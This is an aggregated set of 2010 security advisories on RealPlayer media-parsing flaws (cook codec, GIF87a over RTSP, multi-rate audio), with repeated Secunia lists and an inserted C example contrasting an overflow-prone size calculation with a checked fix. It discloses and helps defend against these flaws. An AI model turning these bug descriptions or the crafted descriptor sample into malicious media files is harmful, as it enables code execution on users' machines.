ZDI-10-272: RealNetworks RealPlayer Cook Audio Codec Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-272
December 10, 2010
-- CVE ID:
CVE-2010-4377
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8454.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-06-25 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
VAR-201012-0253 | CVE-2010-4376 | RealNetworks RealPlayer of RTSP GIF Heap-based buffer overflow vulnerability in the parsing process |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.1, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code via a large Screen Width value in the Screen Descriptor header of a GIF87a file in an RTSP stream. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious media file. The specific flaw exists in the parsing of GIF87a files over the streaming protocol RTSP. When specifying a large Screen Width size in the Screen Descriptor header, a calculation of the destination heap chunk's size is improperly checked for overflow. This leads to a smaller buffer being allocated and subsequently a heap overflow when processing the received data. Exploitation of this vulnerability can lead to system compromise under the credentials of the currently logged in user.
Real Networks released an advisory regarding 27 security vulnerabilities in RealPlayer. Real Networks RealPlayer is prone to a heap overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer SP 1.1.1 and prior, Mac RealPlayer 11.1.0.1116 and prior, Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it.
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing an MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number of streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
----------------------------------------------------------------------
ZDI-10-271: RealNetworks RealPlayer RTSP GIF Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-271
December 10, 2010
-- CVE ID:
CVE-2010-4376
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8308.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-06-25 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
VAR-201012-0252 | CVE-2010-4375 | RealNetworks RealPlayer Multi-rate audio heap-based buffer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, Mac RealPlayer 11.0 through 11.1, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to execute arbitrary code via malformed multi-rate data in an audio stream. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists when parsing a RealMedia file containing a malformed multi-rate audio stream. The application explicitly trusts two 16-bit values in this data structure which are then used to calculate the size used for an allocation.
Real Networks released an advisory regarding 27 security vulnerabilities in RealPlayer. Real Networks RealPlayer is prone to a heap overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer 11.1 and prior, Mac RealPlayer 11.1.0.1116 and prior, Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more.
----------------------------------------------------------------------
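The GIF87a Screen Descriptor flaw in VAR-201012-0253 and the multi-rate audio flaw in VAR-201012-0252 above share one bug class: an allocation size derived from attacker-controlled header fields (two 16-bit values times a small factor) without a check that the multiplication wrapped, so the buffer comes out smaller than the data copied into it. The following C example is added by the editor to illustrate that class next to its fix; it is not RealPlayer code and none of its names (unchecked_frame_size, checked_frame_size, gif_frame_bytes, MAX_FRAME_BYTES) come from the advisories. The sample descriptor bytes and the 64 MiB ceiling are constructed for the illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>
#include <inttypes.h>

/* Constructed illustration, not RealPlayer code. A 64 MiB ceiling on one
 * decoded frame stands in for whatever bound a real player would enforce. */
#define MAX_FRAME_BYTES (64u * 1024u * 1024u)

/* Vulnerable pattern: the size is computed in 32-bit arithmetic and handed to
 * the allocator as-is. Two 16-bit header fields multiplied by a small
 * per-pixel factor can pass 2^32, so the allocation is smaller than the
 * data the parser later copies into it. */
static uint32_t unchecked_frame_size(uint16_t width, uint16_t height,
                                     uint32_t bytes_per_pixel)
{
    return (uint32_t)width * height * bytes_per_pixel;   /* may wrap */
}

/* Overflow-checked 32-bit multiply: returns 0 and leaves *out untouched when
 * a*b does not fit in uint32_t. Portable stand-in for __builtin_mul_overflow. */
static int mul_u32_checked(uint32_t a, uint32_t b, uint32_t *out)
{
    if (a != 0 && b > UINT32_MAX / a)
        return 0;
    *out = a * b;
    return 1;
}

/* Hardened pattern: reject zero dimensions, check each multiplication for
 * wrap-around, and enforce an explicit upper bound. Returns the byte count,
 * or 0 when the header must be rejected (a valid frame is never 0 bytes). */
static uint32_t checked_frame_size(uint16_t width, uint16_t height,
                                   uint32_t bytes_per_pixel)
{
    uint32_t pixels, bytes;

    if (width == 0 || height == 0 || bytes_per_pixel == 0)
        return 0;
    if (!mul_u32_checked(width, height, &pixels))
        return 0;
    if (!mul_u32_checked(pixels, bytes_per_pixel, &bytes))
        return 0;
    if (bytes > MAX_FRAME_BYTES)
        return 0;
    return bytes;
}

/* GIF87a Logical Screen Descriptor: 7 bytes, little-endian
 *   width(2) height(2) packed(1) background index(1) aspect ratio(1)
 * Reads the two size fields and returns the checked frame size, or 0 when
 * the descriptor is truncated or describes a frame that must not be allocated. */
static uint32_t gif_frame_bytes(const uint8_t *desc, size_t len,
                                uint32_t bytes_per_pixel)
{
    uint16_t width, height;

    if (desc == NULL || len < 7)
        return 0;
    width  = (uint16_t)(desc[0] | (desc[1] << 8));
    height = (uint16_t)(desc[2] | (desc[3] << 8));
    return checked_frame_size(width, height, bytes_per_pixel);
}

/* Constructed sample descriptors: 640 x 480, and 32768 x 32768. With 4 bytes
 * per pixel the second one is exactly 2^32 bytes and wraps to 0. */
static const uint8_t benign_screen_desc[7]  = { 0x80, 0x02, 0xE0, 0x01, 0x00, 0x00, 0x00 };
static const uint8_t crafted_screen_desc[7] = { 0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00 };

int main(void)
{
    printf("unchecked 32768x32768x4 -> %" PRIu32 " bytes\n",
           unchecked_frame_size(32768, 32768, 4));           /* prints 0 */
    printf("checked   32768x32768x4 -> %" PRIu32 " (0 = rejected)\n",
           checked_frame_size(32768, 32768, 4));
    printf("benign descriptor        -> %" PRIu32 " bytes\n",
           gif_frame_bytes(benign_screen_desc, sizeof benign_screen_desc, 4));
    printf("crafted descriptor       -> %" PRIu32 " (0 = rejected)\n",
           gif_frame_bytes(crafted_screen_desc, sizeof crafted_screen_desc, 4));
    return 0;
}
```

The checked path fails closed: a header that would wrap is rejected before any allocation, and the separate ceiling catches sizes that are arithmetically valid but unreasonable for a single frame, which is the check a detection or fuzzing harness would also want to see in a parser under review.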
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing an MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number of streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
----------------------------------------------------------------------
ZDI-10-266: RealNetworks RealPlayer Multi-Rate Audio Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-266
December 10, 2010
-- CVE ID:
CVE-2010-4375
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8441.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-04-15 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
VAR-201012-0248 | CVE-2010-4387 | RealNetworks RealPlayer RealAudio codec arbitrary code execution vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The RealAudio codec in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, Mac RealPlayer 11.0 through 12.0.0.1444, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted audio stream in a RealMedia file. Real Networks RealPlayer is prone to a memory-corruption vulnerability because the software fails to perform adequate boundary-checks on user-supplied data.
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer SP 1.1.4 and prior, Mac RealPlayer 12.0.0.1379 and prior, and Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number of streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen.
15) The vendor credits Chaouki Bekrar, Vupen.
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
I. BACKGROUND
